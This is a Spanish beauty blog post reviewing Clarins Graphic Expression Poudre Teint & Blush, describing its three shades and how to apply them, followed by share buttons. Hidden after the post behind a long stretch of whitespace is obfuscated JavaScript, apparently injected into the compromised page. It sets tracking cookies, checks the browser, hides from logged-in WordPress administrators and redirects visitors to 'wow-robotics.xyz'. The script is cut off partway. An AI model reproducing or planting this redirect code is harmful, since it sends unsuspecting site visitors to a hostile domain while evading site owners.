Estoy segura, de que a muchas de vosotras, os gustaría tener un tono en el rostro uniforme, una piel luminosa y los rasgos más definidos.

Os voy a presentar estos polvos de Clarins Graphic Expression Poudre Teint & Blush, que son polvos y colorete en un solo producto. Son polvos con una agradable textura compuestos por una combinación universal de tres tonos:

  1. Un beige claro para iluminar.
  2. Un beige más oscuro para unificar y aportar color a la piel.
  3. Un colorete de color rosa coral para redefinir y destacar los rasgos de la cara.

Y también, tiene un ligero toque dorado que aporta ese toque luminoso a la piel.     

Para aplicar los polvos, basta con pasar la brocha por los tres tonos y aplicarlos en todo el rostro para iluminarlo. Tomar el color rosa con la brocha y aplicarlo en la parte superior de los pómulos para potenciar la luminosidad del rostro. Así, conseguiremos resaltar esa zona, haciendo servir el producto como colorete.

¡Y lista para lucir una tez radiante! 🙂

Producto disponible online

                                                                                                                                                                                                                                                                                                                                                                   var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone